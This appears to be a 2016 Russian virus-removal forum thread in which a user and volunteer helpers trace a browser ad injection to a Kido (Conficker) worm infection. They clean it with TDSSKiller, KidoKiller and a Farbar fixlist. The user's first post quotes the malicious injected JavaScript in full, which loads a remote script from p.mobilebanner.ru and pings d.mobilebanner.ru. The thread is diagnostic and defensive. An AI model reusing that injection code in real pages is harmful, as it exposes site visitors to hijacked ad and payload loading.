mobilebanner.ru [Net-Worm.Win32.Kido.ih ]

Printable View

29.11.2016, 13:47
usrg

Вложений: 3

mobilebanner.ru [Net-Worm.Win32.Kido.ih ]

Нашел сходную тему, где пока нет ответа - [URL]http://virusinfo.info/showthread.php?t=206330[/URL] - и решил добавить немного деталей, но в той теме не могу отвечать.

Зловреда обнаружил по зависшему запросу к d.mobilebanner.ru с обращением за файлом p.gif и подумал, что у меня сайт заражен, но весь код на сервере чистый и соответствует летнему бекапу. В итоге нашел подмену одного из загружаемых javascript-ов вот таким -

[PHP]!function(){function t(){(new Image).src="http://d.mobilebanner.ru/p.gif"}function e(){return window.innerWidth>=320&&window.innerWidth<=450}function n(){try{return window.self!==window.top}catch(t){return!0}}function r(){var t=document.getElementsByTagName("head")[0],e=document.createElement("script");e.src="http://p.mobilebanner.ru/ad/base.js?",e.type="text/javascript",t.appendChild(e)}function i(t){a.parentNode.insertBefore(t,a.nextSibling)}function c(t){document.write(t.outerHTML)}function o(){for(var t=document.createElement("script"),e=Array.prototype.slice.call(a.attributes),n=0;n<e.length;n++)t.setAttribute(e[n].nodeName,e[n].nodeValue);return t.src="http://сайт.домен/оригинальный_скрипт.js?",t}var a=document.currentScript||document.scripts[document.scripts.length-1],d=o();a.async||a.defer?i(d):c(d),t(),window.__qsrad||n()||!e()||(window.__qsrad=1,r())}();[/PHP]

Пользуюсь Mozilla FireFox и в других браузерах проблемы не наблюдается. Проверка системы AWCleaner/HitmanPro/CureIt/KVRT ничего не дала. Файлы от Hijack и avz прикладываю к посту, хотя дальше файрфокса заражение видимо не ушло.
29.11.2016, 13:49
Info_bot

Уважаемый(ая) [B]usrg[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="http://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
01.12.2016, 01:15
SQ

Здравствуйте,

[CODE]>>> Подозрение на маскировку ключа реестра службы\драйвера "kypfmrnpe"[/CODE]

- Покажите лог [URL="http://media.kaspersky.com/utilities/VirusUtilities/RU/tdsskiller.exe"]TDSSKiller[/URL]
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

- Сделайте лог [URL="http://dragokas.com/tools/CheckBrowsersLNK_test.zip"]Check Browsers' LNK by Dragokas & regist[/URL].

- Подготовьте лог [URL="http://virusinfo.info/showthread.php?t=146192&p=1041844&viewfull=1#post1041844"]AdwCleaner[/URL] и приложите его в теме.
01.12.2016, 09:42
usrg

Вложений: 3

Я ошибся в первом сообщении насчет активности только в ФайрФоксе - в Хроме тоже самое.

***

TDSSKiller что то нашел и кажется убил. Две других проги ничего не обнаружили.
01.12.2016, 13:18
SQ

Уточните пожалуйста в каталоге TDSSKiller образовался ли карантин?

Если присутствует карантин, то пожалуйста загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

[CODE]09:18:13.0468 0x0f68 Detected object count: 1
09:18:13.0468 0x0f68 Actual detected object count: 1
[B]09:18:24.0390 0x0f68 C:\WINDOWS\system32\owasuy.dll - copied to quarantine[/B]
09:18:24.0390 0x0f68 HKLM\SYSTEM\ControlSet002\services\udsgld - will be deleted on reboot
09:18:24.0390 0x0f68 HKLM\SYSTEM\ControlSet004\services\udsgld - will be deleted on reboot
09:18:24.0390 0x0f68 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\svchost:netsvcs - will be cured on reboot
09:18:24.0390 0x0f68 C:\WINDOWS\system32\owasuy.dll - will be deleted on reboot
09:18:24.0390 0x0f68 udsgld ( UDS:DangerousObject.Multi.Generic ) - User select action: Delete
09:18:24.0484 0x0f68 KLMD registered as C:\WINDOWS\system32\drivers\42014655.sys
09:18:56.0828 0x0e4c Deinitialize success[/CODE]
02.12.2016, 22:20
usrg

[QUOTE=SQ;1416848]Уточните пожалуйста в каталоге TDSSKiller образовался ли карантин?

Если присутствует карантин, то пожалуйста загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
[/QUOTE]
Образовался. Загрузил архивом по ссылке.
02.12.2016, 23:23
SQ

[QUOTE=usrg;1417316]Образовался. Загрузил архивом по ссылке.[/QUOTE]
Обнаружен Net-Worm.Win32.Kido.ih

Пройдитесь утилитой [URL="http://media.kaspersky.com/utilities/VirusUtilities/RU/kidokiller.exe"]KidoKiller.exe[/URL] сообщите результат.
06.12.2016, 07:16
usrg

Копирую экран отработавшей утилиты -
[QUOTE]Net-Worm.Win32.Kido removing tool, Kaspersky Lab 2010
version 3.4.15 Mar 19 2010 10:17:17
scanning jobs ...

scanning processes ...

scanning threads ...

scanning modules in svchost.exe...
scanning modules in services.exe...
scanning modules in explorer.exe...

scanning C:\WINDOWS\system32 ...
C:\WINDOWS\system32\owasuy.dll infected Net-Worm.Win32.Kido ... cured
scanning C:\Program Files\Internet Explorer\ ...
scanning C:\Program Files\Movie Maker\ ...
scanning C:\Program Files\Windows Media Player\ ...
scanning C:\Program Files\Windows NT\ ...
scanning C:\Documents and Settings\User\Application Data ...
scanning C:\WINDOWS\Temp\ ...
scanning Flash drives ...

completed
Infected jobs: 0
Infected files: 1
Infected threads: 0
Spliced functions: 0
Cured files: 1
Fixed registry keys: 3

Для продолжения нажмите любую клавишу . . .
[/QUOTE]
Я думал TDSSKiller закрыл вопрос, во всяком случае браузеры перестали ломиться на мобайлбаннер... а зловред оказывается активен >:(
06.12.2016, 10:48
SQ

Перегрузите ПК и проверьте заново.
07.12.2016, 09:52
usrg

После первой перезагрузки не появилось, но сейчас уже снова dll-ка в system32 и сервис, который встраивает мобайлбаннер...

Скачал чуть не десяток убийц Kido от всех производителей антивирей - ничего не нашли, а меж тем загрузчик зловреда где то сидит.
11.12.2016, 20:25
SQ

- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.

[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
11.12.2016, 23:54
usrg

Вложений: 2

Логи Farbar прикладываю к сообщению.

Прогнал kidokiller - пока чисто, но за компом никто не работал, а в прошлый раз зловред не сразу возвращался...
12.12.2016, 20:48
SQ

Знакома ли Вам?
[CODE]FF Extension: (Google search link fix) - C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\Extensions\[email protected] [2016-09-04]
[/CODE]
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1801674531-362288127-725345543-1004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Extension: (No Name) - C:\Program Files\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF SearchPlugin: C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\searchplugins\yqs-barff-yandex.xml [2013-09-08]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff => not found
FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi => not found
FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\SeaMonkey\Extensions: [[email protected]] - C:\Documents and Settings\User\Application Data\IDM\idmmzcc5 => not found
FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll [No File]
CHR HomePage: Default -> hxxp://www.yandex.ru/?win=84&clid=1976586-10000000
CHR StartupUrls: Default -> "hxxp://www.yandex.ru/?win=84&clid=1976586-10000000"
CHR DefaultSearchURL: Default -> hxxp://{searchTerms}
CHR DefaultSearchKeyword: Default -> hax
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\21.0.1180.83\PepperFlash\pepflashplayer.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => No File
CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll => No File
CHR Plugin: (Native Client) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\pdf.dll => No File
CHR Plugin: (QUAKE LIVE) - C:\Documents and Settings\All Users\Application Data\id Software\QuakeLive\npquakezero.dll => No File
CHR Plugin: (Google Update) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll => No File
CHR Plugin: (Java(TM) Platform SE 6 U31) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll => No File
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.1.10111.0\npctrl.dll => No File
CHR HKLM\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx <not found>
CHR HKLM\...\Chrome\Extension: [nkcpopggjcjkiicpenikeogioednjeac] - C:\Documents and Settings\User\Local Settings\Temp\nkcpopggjcjkiicpenikeogioednjeac.crx <not found>
CHR HKLM\...\Chrome\Extension: [ochbjojkpcmlfeagbaahkofepalngihg] - <no Path/update_url>
CHR HKU\S-1-5-21-1801674531-362288127-725345543-1004\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
S2 StarOpen; no ImagePath
NETSVC: kypfmrnpe -> no filepath.
Task: C:\WINDOWS\Tasks\µTorrent.job => C:\PROGRA~1\uTorrent\uTorrent.exe
AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\TEMP:93433455 [822]
AlternateDataStreams: C:\Documents and Settings\User\Рабочий стол\ToXXuS(xmir.or)_Bike.pdf:.gltth [21090]
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
13.12.2016, 00:02
usrg

Вложений: 1

[QUOTE=SQ;1419196]Знакома ли Вам?
[CODE]FF Extension: (Google search link fix) - C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\Extensions\[email protected] [2016-09-04]
[/CODE]
[/QUOTE]
Да - [url]https://github.com/palant/searchlinkfix[/url] - поставил вполне сознательно.

Лог фикса от Farbar прилагаю.

Зловреда пока все так же не видно - возможно какое то из опробованных антивирусных средств сработало, но без оповещений... И это был не kidokiller, посколько за последнии пару недель он минимум трижды убивал owasuy.dll в систем32 и какие то ключи в реестре, почему и опробовал десяток подобных ему утилит доступных в сети.
13.12.2016, 14:28
SQ

Установите какой-то антивирус, например Kaspersky Free (бесплатный) скорее всего у Вас в сети есть зараженный ПК, который заражает Ваш ПК.

P.S. Вам необходимо найти ip-адрес зараженного ПК.
16.12.2016, 01:21
usrg

В сети у соседа нашелся комп, где Avira проморгала заражение... Лечим.

Спасибо. Думаю тема исчерпана.

P.S. Что закрыть/отключить в XP, чтобы Kido не мог заражать через сеть?! Помимо установки антивируса...
16.12.2016, 01:31
mrak74

[quote="usrg;1420074"]P.S. Что закрыть/отключить в XP, чтобы Kido не мог заражать через сеть?! Помимо установки антивируса...[/quote]
Ничего отключать не надо. Вирус использует уязвимость Windows, для того чтобы её закрыть необходимо установить 3 обновления Microsoft: kb 958644, kb 957097, kb 958687.
16.12.2016, 01:41
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]1[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] \tdsskiller_quarantine\01.12.2016_09.18.03\uds0000\svc0000\tsk0000.dta - [B]Net-Worm.Win32.Kido.ih[/B] ( DrWEB: Win32.HLLW.Autoruner.5555, BitDefender: Win32.Worm.Downadup.Gen, NOD32: Win32/Conficker.AA worm, AVAST4: Win32:Confi [Wrm] )[/LIST][/LIST]